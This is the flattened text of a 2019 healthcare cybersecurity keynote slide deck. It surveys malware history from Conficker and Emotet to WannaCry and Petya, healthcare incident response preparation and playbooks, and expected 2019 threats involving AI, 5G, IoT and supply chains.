Looking Towards the Future with Teachings from the Past

Looking Towards the Future with Teachings from the Past Cybersecurity Forum – Opening Keynote, February 11, 2019 Ron Mehring, CISSP VP Technology & Security, CISO, Texas Health Resources Axel Wirth, CPHIMS, CISSP, HCISPP Distinguished Technical Architect, Symantec Corporation 1 Conflict of Interest

Ron Mehring, CISSP has no real or apparent conflicts of interest to report.

Axel Wirth, CPHIMS, CISSP, HCISPP is employed by Symantec, a cybersecurity vendor, but has no real or apparent conflicts of interest to report.

2 Learning Objectives

• Identify how cyber-attacks were actually executed and understand cyber-attack trends • Explain how effective response to cyber-attacks can mitigate the impact and damage • Discuss what we may expect in the coming year regarding cyber-attacks in the healthcare space • State lessons learned from the past to assist with the present and what is anticipated in the future

3 Agenda

1. Evolution of Cyber-Attacks 2. Effective response and impact mitigation 3. What we may expect in the coming year 4. Lessons learned and anticipating the future 5. Discussion / Q&A

4 Cybersecurity – Historic Timeline

“Core Wars” game First fully-functional virus Analogy to biological virus (Bell Labs) (V Risak, TU Vienna, Siemens) (J Kraus, U of Dortmund)

Theory of self-replicating “Creeper” concept demo “A Disease of Machinery” “Computer virus” general code (J von Neumann) (ARPANET, PDP-10) (Westworld, MGM) definition (F. Cohen, UC) 1949 1950s 1970 1972 1973 1980 1984 Ancient History (1940 – 1980s)

“Elk Cloner” released “SCA” leads to first virus “Concept” first macro “ILOVEYOU” million+ (15 yo, Apple II) checker (Amiga, est. 40%) virus (MS Word) infections in hours

“Brain” tracking copyright “AIDS” first ransomware “Melissa” 1st social eng.; “SQL Slammer” violations (MS-DOS) (MS-DOS) 20% of world’s computers fastest worm 1982 1986 1987 1989 1995 1999 2000 2002 Middle Ages (1980s – 2000’s)

“Conficker” infects Multiple highly sophisticated “Mirai” highly disruptive est. 15M computers viruses (e.g. Duqu, Flame) IoT DDoS, up to 1TBit/s

Reports of Cyberwarfare “Stuxnet” sabotage of “CryptoLocker” ransomware “WannaCry” & “Petya” (Syria, Ukraine, Georgia) Iranian nuclear program “Darlloz” IoT virus cause $B+ losses 2007/08 2008 2010 2011/12 2013 2016 2017

Modern Age (2000’s – today) 5 Conficker – Happy 10th Birthday • Conficker (W32.Downadup) computer worm: – 5 variants produced (Nov. 2008 – April 2009) – Win2k, XP, Server 2003 & 2008, Vista – Multiple purposes: open backdoors, spam bot, keylogger, download other malware, … – Multiple propagation methods: Internet, LAN, shared folders, mapped drives, peer-to-peer networking, portable media (USB) – Estimated to have infected up to 15 million computers (compare: WannaCry: 350,000) • Advanced capabilities and highly resilient: – Hides and replicates before becoming active – Scans network for machines with the same vulnerability – Has the capability to protect itself (e.g. disable AV and Windows updates) • Still prevalent – but limited impact: – No active C&C servers – Fewer infections as target OS’s are declining, may have run its course by 2020 – Latent infections residing on legacy systems, e.g., leading malware in healthcare (June 2016) • Other noteworthy facts: – $250,000 bounty still available! – The end goal of Conficker has never become clear 6 • Other long-living malware: Sality (2003), MyDoom (2004), Zeus (2011), Mirai (2016) Emotet – Rolling with Opportunities

• Mealybug Cyber Crime Actor: – Active since at least 2014 – Initially targeting banking industry in Europe – Custom malware Trojan.Emotet (network worm) – Brute force attack via password list • Started shifting focus in 2017 – Providing delivery services for other threat actors with Trojan.Emotet functioning as a “loader” – Europe  U.S. (Canada, Mexico, China) • Key modules per direction of C&C server: Source: Symantec ISTR – Banking module – steals banking details from network traffic – Email client infostealer – email credentials – Browser infostealer – browsing history and passwords – PST infostealer – email addresses – DDoS module – carry out DDoS attacks • Mealybugs, as a evolving threat actor, has been refining their techniques: – Shifted from few regional banking attacks to a global distributor for other groups – Maximizing returns based on core competency and tools available 7 High Impact Malware Care Delivery, Supply Chain, Privacy

WannaCry, Petya Trojan.Nibatad

• EternalBlue exploit (NSA leak) • Largest national HC provider, SE Asia • WannaCry (May 2017): • July 2018 attack • 1.5M records, incl. Prime Minister • faulty Ransomware, ~$4-$8B global impact • Post mortem report: • Petya (June 2017): • Breach identified, but no action taken • cloaked Ransomware (Wiper), ~$10B impact • Missing Risk Assessment • WannaCry - care delivery impact: • Lack of training, awareness, and concern • 81 of 236 hospital trusts; 595 of 7545 GP’s • Lack of vulnerability scans and pen testing • 1000+ systems, 19,000 appts., ~£92M loss • Missing patch, poor password policies • Root Cause: Underinvestment, patching • 16 recommendations (7 critical): • Leading to £21M security investment • Enhance security structure • Review and assess cyber security stack • WannaCry still active! • Improved staff awareness - prevent, detect, • Petya – healthcare supply chain and respond to security incidents • Global pharma company - ~$310M loss, • Enhanced security checks global drug and vaccine availability • Tighten privileged admin account controls • Transcription service provider - ~$68M loss, • Improve incident response processes 8 impacted hosted transcription service • Private/public partnerships around security Summary – Threat Landscape Trends Cybercrime continues to follow money and opportunity  Worms are back: • Hitting networks today, expect next generation IoT worms  Targeted attacks are hitting diverse targets: • Profiling, targeting, and execution continue to improve • E.g. Orangeworm group - healthcare  Email malware rates are increasing again: Top 10 Malwares 12/2018 • Dropped 50% in 2017, back up in 1H 2018 • Emotet • Kovter  BEC scams continue to be profitable: • ZeuS • Business Email Compromise: $12B loss in 6 years • NanoCore  Ransomware numbers are stable: • Cerber • Crowded market, some have moved on • Gh0st  Cryptojacking remains popular • CoinMiner • Trickbot • But – rises and falls with Cryptocurrency value • WannaCry  IoT devices are the soft target: • Xtrat Source: CIS • Patching, default credentials, forgotten • 159% increase of attacks (7/17-7/18) 9 Agenda

1. Evolution of Cyber-Attacks 2. Effective response and impact mitigation 3. What we may expect in the coming year 4. Lessons learned and anticipating the future 5. Discussion / Q&A

10 Effective Response

1. Preparation 2. Execution 3. Communication

Detection and Escalation and Getting Organized Response Peering

Preparation is the key to Response activities must Timely escalation to peering managing the incident response account for multiple conditions response groups and cycle and reducing impact. and complexity of organization. leaderships teams.

11 Effective Response: Preparation

Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity

Threat Catalog Asset Inventory Catalog of potential threats Accurate inventory of with associated response Identity Inventory technology assets that includes playbooks. Accurate inventory of identities location, criticality and use. and entitlements across technology and application portfolio.

Data Inventory Inventory of sensitive data and data flow. Exercises Tool Management Incident exercise plan tailored to Inventory of analytics and 12 unique environments and response tools. playbooks. Effective Response: Execution Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity

1. Protect Data Confidentially Regulated Data, Credit Card Data. Requirements may conflict with patient safety needs. • Effective incident 2. Protect the Enterprise response plans Control robustness must balance reliability and security. account for diverse Privacy operating environments and stakeholder Risk Based protection, Cybersecurity 01 02 03

Equilibrium detection and Response

Playbooks response needs. Patient Safety • Reduction in time to 3. Protect the Patient respond and Medical devices and other critical care Response Plan Preparation Phase PreparationPlan Response device protection needs may conflict with remediate data confidentially requirements. 13 Effective Response: Playbooks

Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity

Example: Malware Attack Playbook

Cyber Incident Response Phases

Cascading Unique Playbooks • What type of Attack? • What type of Asset, Identity, Data Type? • Exposure? Treasury Privacy Patient Physical HICS/System JV/Business (PCI) Safety Security Preparedness Partners/Vendors

Cyber/Technology Teams HTM Legal HR Risk Facilities Business Process (Medical Devices) Financing Owners

14 Effective Response: Communication

Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity

A robust communication plan that reflects the different cyber incident stakeholder groups is critical to controlling incident impacts.

• The need to communicate effectively before, during and after incident should not be underestimated.

• Preparation phase requirements and inputs should be well understood by technology/data custodians and system owners.

• Timing of stakeholder involvement is important.

• Balancing incident sensitivity classification and transparency must be addressed up front.

15 Agenda

1. Evolution of Cyber-Attacks 2. Effective response and impact mitigation 3. What we may expect in the coming year 4. Lessons learned and anticipating the future 5. Discussion / Q&A

16 What to Expect for 2019 The Big Picture / Broader and Continuing Trends Political cyber-conflicts will be a growing risk: • A serious cyber event with socio-economic impact is increasingly likely • Continued evolution of cyber conflicts for strategic and economic benefits

Growing attack surface – attackers roll with opportunities: • Digitization (more data) • Digitalization (more digital infrastructure) • Technology adoption (IoT, cloud, 5G, AI/ML)

New and creative attack vectors: • Supply Chain as attack vector • Data in Motion attacks

Consequently: • We will continue to see big names in the headlines • It will not just be about Confidentiality anymore 17 What to Expect for 2019 – AI & ML

Let’s not confuse the two – AI/ML refer to the capability of a machine to: ML = learn without explicitly being programmed (= learning) AI = imitate intelligent human behavior (= perception, decision, autonomy)

Defenders will increasingly depend on ML/AI to counter attacks and identify vulnerabilities: • Reliable and fast analysis of large, complex (and boring) data sets across multiple internal and external security control points • Analyze information with no apparent logical or discernable pattern • Rapid identification of new exploits (threat intelligence) • Predictive protection (automate identification and response)

• Augment human talent (or lack thereof) Us vs. Them vs. Us Attackers will exploit ML/AI systems and use them to aid their assaults: • Craft new attacks, uncover new vulnerabilities (zero days)

• Circumvent our ML/AI defenses through model extraction or poisoning 18 What to Expect for 2019 – AI & ML

ML / AI Utilization and Benefits - Examples Defenders Attackers Identify new threats and provide better Corrupt AI-based business systems (faster) threat intelligence Support intelligence and reconnaissance Uncover & fix new vulnerabilities (network probing, vulnerabilities) Advanced attack simulations Sophisticated and tailored social engineering attacks Better detection and response capabilities Realistic disinformation campaigns Protect digital security and privacy (UBA, ID protection, content monitoring) AI-powered toolkits and services

The “Terminator Wars” of the future will likely occur in cyber space and play out at scale, speed, and cost that humans cannot match 19 Technology Adoption as Opportunity

5G - from 1 Gbps to 10 Gbps, a $26B market by 2022 (IDG)

Technology Trends and Impact: Opportunity for Adversaries: • 5G will drive other technologies and make • Expanded attack surface area them even more attractive: • Circumvent enterprise and home Cloud – any data anywhere security controls Mobile – slow consumer adoption may limit • Direct attack on devices penetration, but 5G will enable • Leverage device as “bridgehead” cheaper devices (less storage) IoT – new IoT devices will provide 5G “out of • Capture or manipulate “data in the gate” and enable convenience and motion” or poorly protected cloud new value-added services accounts • IoT (and other) device traffic will bypass home routers and enterprise networks • Crossover within a few years: More 5G devices will connect directly to public networks than via a Wi-Fi routers 20 Source: Symantec ISTR Technology Adoption as Opportunity IoT (IoMT / Embedded Systems / Medical Devices) Technology Trends and Impact: • Business: improve efficiency, reduce costs, benefit from more data points, etc. • Consumer: improve comfort, ease of use, quality of life • Enable new business and service delivery models through physical devices • Provide service where the consumer (patient) is

Opportunity for Adversaries: • Exploit poorly secured IoT infrastructure • Bridge the virtual and physical worlds – attacks that can do damage: • Kinetic attacks (e.g. cars, pacemaker) • Critical Infrastructure: utilities, food supply, ports, traffic control, finance, healthcare • IoT-based events will move beyond massive DDoS assaults (e.g. Mirai): • Ransom, blackmail, stalking, botnets, etc. 21 Source: Symantec ISTR Other Relevant Threat Trends

Supply Chain Attacks: • Deliver payload (malware) via trusted 3rd party software (e.g. Petya): – Difficult to identify: Trusted domain, digitally signed, trusted update process – Benefits: Rapid distribution within a targeted industry or region – Circumvent traditional security controls, access with elevates privileges • Potential to infect and utilize hardware supply chain in the future: – Such attack would be highly sophisticated and difficult to detect – Resistant to malware removal, reboot, reformatting, or reinstallation

Data-in-Transit Attacks: • Gain access to routers and other network infrastructure: – Steal credentials, account, or other confidential information – Deliver compromised web page to capture confidential information (a variation of “formjacking”)

– Manipulate data between sender and recipient 22 Regulatory and Legislative Action GDPR (European General Data Protection regulation) set the Stage • Other nations are following suit (Canada, Brazil) Distinct drivers are evolving: compliance, security, privacy, safety • U.S. has traditionally had a disparate approach (by State or by Industry): – In 2018, California passed toughest privacy law yet – Federal security and/or privacy laws may evolve over the next few years – Revision of HIPAA Privacy Rule is under discussion – FDA Guidance's on Medical Device Cybersecurity – NIST Cybersecurity Framework – NIST Privacy Framework (in progress) – HHS Cybersecurity Working Group and resulting in Task Group Workstreams – Multiple House and Senate bills in process (Med Devices, IoMT, IoT, certification) • An uptick in legislative and regulatory security and privacy action is certain – Improve consumer rights and protection – Reduce the risk of breach or harm

– Harmonize requirements across regions and industries 23 – Balanced with the need for information sharing Agenda

1. Evolution of Cyber-Attacks 2. Effective response and impact mitigation 3. What we may expect in the coming year 4. Lessons learned and anticipating the future 5. Discussion / Q&A

24 What have we learned

1. Orchestration 2. Analytics 3. Post Incident

Playbooks and Detection and Lessons Automation Response Learned

Threat models will need to Response activities must Risk Management and Root have dynamically assigned account for complex Cause analysis provides an actions with predefined environments. important feedback loop. escalation.

25 What have we learned: Orchestration

Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity

Advancing Orchestration capabilities will be key in handling current and future threats. People training will be key!

26 What have we learned: Analytics

Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity

Speed and quantity of attacks are John Boyd’s OODA Loop increasing. This will require data to become a stronger factor in reducing friction within response processes

Improving system to system interfaces and automation to Incident reduce response dwell time. e rv se b Artificial intelligence and O behavioral analytics are required Event to help better inform analysts and improve response cycle.

27 What have we learned: Integration Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity • AI and analytics will need to be considered to help drive orchestration / automation and analyst practices to help improve time to detection, time to respond performance.

• Security architecture planning, reliability engineering and development of performance measures will be critical.

• Integrating analytics into a continuous controls testing model and security architecture will be necessary to keep up with the changing business, architectures, and development cycles.

Orchestration n Opportunity for AI

Platform and i

Processes p and behavioral

s analytics

Advanced Cyber m

Operations T

t Low quantity,

Event - s

y Analytics l minimal time and AI/Behavioral a

Systems n Analytics A high fidelity Village elders, rule of thumb, heuristics

28 Number of Event/Alerts to be actedon What we have learned: Post Incident

Preparation Analysis/Detection Containment Eradication Recovery Post Incident Activity

Risk Provides transparency for executive leadership and defines risk tolerance, policy and remediation investment priorities. Feedback A control architecture review helps define the requirements and control robustness signaling between risk and operations. Operations Coordinates root cause analysis of bad outcomes (incidents or control performance issues). Operations consumes risk decisions and advances or corrects processes and technologies. 29 Agenda

1. Evolution of Cyber-Attacks 2. Effective response and impact mitigation 3. What we may expect in the coming year 4. Lessons learned and anticipating the future 5. Discussion / Q&A

30 Questions

“There's a clear pattern here which suggests an analogy to an infectious disease process, spreading from one area to the next. … I must confess, I find it difficult to believe in a disease of machinery." From the Movie Westworld (1973)

Ron Mehring, CISSP Axel Wirth, CPHIMS, CISSP, HCISPP 682-236-8282 617-999-4035 [email protected] [email protected] @mehringrc @axel_wirth

31 Further Reading Scientific American: “When and how did the metaphor of the computer 'virus' arise?”, https://www.scientificamerican.com/article/when-and-how-did-the-meta/ Richard Clarke: “Cyber War: The Next Threat to National Security and What to Do About It”, April 2012, https://www.amazon.com/gp/product/0061962244 Bruce Schneier: “Click Here to Kill Everybody: Security and Survival in a Hyper-connected World” Sept. 2018, https://www.amazon.com/dp/0393608883 The Conficker Working Group, http://www.confickerworkinggroup.org/wiki/pmwiki.php Magnolia Pictures: “Zero Days”, July 2016, https://www.imdb.com/title/tt5446858/ ISE: “Hacking Hospitals”, Feb. 2016, https://www.securityevaluators.com/hospitalhack/ UK Health and Social Care System: “Lessons learned review of the WannaCry Ransomware Cyber Attack”, Feb. 2018, https://www.england.nhs.uk/wp-content/uploads/2018/02/lessons-learned-review- wannacry-ransomware-cyber-attack-cio-review.pdf AAMI: “Medical Device Cybersecurity – A Guide for HTM Professionals”, June 2018, http://www.aami.org/productspublications/ProductDetail.aspx?ItemNumber=6489 Symantec: “Internet Security Threat Report”, annual, http://www.symantec.com/threatreport HIMSS Privacy & Security Committee, https://www.himss.org/library/healthcare-privacy-security NIST SP 800-61, “Computer Security Incident Handling Guide”, https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-61r2.pdf Ponemon Institute: The value of AI in Cybersecurity: July 2018, https://www- 32 01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=41017541USEN